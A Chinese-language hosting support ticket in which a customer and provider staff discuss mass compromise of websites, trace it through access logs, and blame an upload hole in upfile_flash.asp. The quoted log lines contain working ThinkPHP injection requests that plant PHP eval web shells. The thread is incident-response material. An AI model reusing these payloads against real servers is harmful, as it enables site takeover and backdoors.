問:
經常客戶不同的網站,被這樣的注入
你們的服務器防護還是有點不行啊 ,我們放西數服務器空間里的很多網站被注入,放萬網服務器里的就沒事,到底怎么回事?
問: 不是一個、二個網站是這樣的,好多個網站都是這樣的請你們看截圖
問:網站里,不同的文件夾被寫入了各種各樣的文件,一定要告知我們源頭怎么來的,到底是怎么回事 這個洞一定要堵住,不是一個網站這樣子,是不少網站都是這樣子,就這段時間;以前都是好好的
答:您好,您的網站存在程序漏洞被掛馬了。
比如 就是加密的后門文件,請您聯系此網站的程序開發人員,溯源對應的程序漏洞,并且進行修復。非常感謝您長期對我司的支持!
問:溯源對應的程序漏洞 : 不要這樣子說
答:您好,根據文件被修改的時間,我們檢查了其對應的訪問日志
16:11:33 POST /feedback.asp – – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Core/1.53.2372.400 QQBrowser/9.5.10548.400 http://www.qunancn.com/feedback.html 200 579 140
16:30:12 GET / s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php%20@eval($_POST[]);?> – 127.0.0.1 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://www.qunancn.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php @eval($_POST[]);?> 200 11711 0
16:30:15 GET / a=fetch&templateFile=public/index&prefix=\’\’&content=<php>file_put_contents(\’hmseo.php\’,\'<?php%20@eval($_POST[hm]);?>hmseo\’)</php> – 127.0.0.1 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://www.qunancn.com//?a=fetch&templateFile=public/index&prefix=\’\’&content=<php>file_put_contents(\’hmseo.php\’,\'<?php @eval($_POST[hm]);?>hmseo\’)</php> 200 11711 0
這三條http請求 非常可疑,請分析一下。
此類情況 請您溯源對應的程序漏洞 進行修改,并且進行安全設置,可以了解:http://www.shinetop.cn/faq/list.asp?unid=733。
非常感謝您長期對我司的支持!
問:網站空間里,第一個注入的文件是那個文件? 是什么時候?
我們 http://www.qunancn.com/feedback.html 這個 feedback.asp 文件引起的問題?
現在是有好幾個網站,都是這樣子被注入的, 我們需要給徹底處理下
答:您好,以上的工單 已經查詢了相應的后門文件,如果需要深入排查,這種屬于您程序漏洞的問題了,還請您自行排查一下 ,非常感謝您長期對我司的支持!
問:網站空間里,第一個注入的文件是那個文件? 是什么時候?
問:我們 http://www.qunancn.com/feedback.html 這個 feedback.asp 文件引起的問題?
網站空間里,第一個注入的文件是那個文件? 是什么時候?
答:您好,網站空間里,第一個注入的文件是那個文件? 是什么時候? 這個是需要根據網站日志進行溯源分析,請下載網站日志到本地,結合網站文件被篡改和創建的時間進行分析,查看具體是通過哪個網站程序漏洞進入網站。相關分析只能您自行進行分析排查。非常感謝您長期對我司的支持!
問:為什么我們很多網站,放阿里云空間里很多年,都沒有被注入過? 以前放恒匯也是被注入(恒匯的空間我們已經不用了),放西數也是被注入,放阿里云就沒事,同樣的代碼程序,這個是怎么回事?
問:你們幫我們分析: 網站空間里,第一個注入的文件是那個文件? 是什么時候?
答:您好,阿里云也是有被注入的,https://www.bilibili.com/read/cv 您可以查看一下,這個和網站程序存在那里沒有關系,您的網站只是運氣好沒有被篡改而已。
問:我們隨便抽查了 80家左右客戶的網站,發現以下網站全部都被注入,而且完全一樣的注入代碼:
問:上面問題,請你們技術主管回答與處理吧
答:您好,
根據文件時間查找對應日志
10:31:34 POST /image/white/buttons.php – – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (compatible; Baiduspider/2.0; h
都是同一個文件修改的,找到/image/white/buttons.php后門文件
根據文件時間查找對應日志
找到后門 //images/_notes/dwsync.php
根據后門文件訪問都的IP搜索,找到后門訪問前的一條異常的記錄
此文件已經刪除,跟蹤中斷
根據/up_pic/qwecer.asp的訪問記錄,掃描異常日志,發現
/upfile_flash.asp此文件是程序自帶的上傳文件,基本確認是此文件有上傳漏洞
index.asp 篡改時間 ??2022-?04-?10,??19:14:25
根據文件時間,查看對應訪問日志
找到后門文件/up_pic/_notes/debanner.php ,
根據文件時間,查看對應訪問日志
此文件已經刪除,跟蹤中斷
09:20:15 POST /upfile_flash.asp – – 127.0.0.1 HTTP/1.1 Mozilla/5.0
從上面兩個網站的掛馬排查上基本確認,網站存在上傳漏洞。處理方法:
2.up_pic 設置目錄保護
上面排查的網站我們沒有做任何修改,相關日志您也可以下載自己分析一下,掛馬建議聯系程序員清理下,非常感謝您長期對我司的支持!
問:哦,修補費用是給我們這個文件修改為正確的, 然后 可以給我們在西數空間里的所有網站這個 upfile_flash.asp 文件給批量替換一下嗎?
問:還有:你們同事說的 這個問題就不用管了是嗎? 這么多網站注入是因為 upfile_flash.asp的漏洞問題 ,而不是上面說的 feedback.asp 文件引起的吧?
問:付費是沒有問題的,這個注入搞的我們太頭疼了
答:您好,是的,只是修復一個文件的費用。所有網站替換這個不包括在內,如果文件是一樣的,你可以自己用這一份正常的文件 去替換 其他的文件。
問:修復這個 upfile_flash.asp的漏洞 800元
然后操作下面的,多少費用?批量替換服務器里所有網站的 upfile_flash.asp 這個文件(所有網站里這個文件都完全一樣的)批量刪除服務器里所有網站的 Thumbs.db 這個文件 與 _notes 這個文件夾 (所有網站里,這2個都是廢的文件及文件夾)
批量替換一個文件,批量刪除一個文件 及 文件夾,如何收費?
我們需要處理的
答:您好, 那些沒辦法 批量替換,我們要處理的話,也是逐個網站手工操作。每個網站處理替換upfile_flash.asp,刪除Thumbs.db 這個文件 與 _notes ,收費 5元/個網站。 你也可以自己處理的。
